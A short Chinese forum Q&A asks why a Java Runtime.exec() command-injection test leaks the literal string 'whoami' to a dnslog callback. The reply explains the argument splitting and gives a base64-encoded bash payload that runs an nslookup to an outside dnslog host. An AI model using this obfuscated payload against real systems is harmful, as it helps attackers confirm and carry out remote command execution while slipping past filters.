Runtime.exec(),对执行的dnslog回显whoami没有解析,直接带出来whoami,是怎么回事呀?

请先 登录 后评论
默认排序 时间排序

1 个回答

龙傲天

他会分割成数组破坏参数,编码一下就好了

payload:bash -c {echo,bnNsb29rdXAgMTIzLmRuc2xvZy5jbg==}|{base64,-d}|{bash,-i}

请先 登录 后评论
  • 1 关注
  • 0 收藏,4839 浏览
  • hz666 提出于 2022-07-14 10:56

相似问题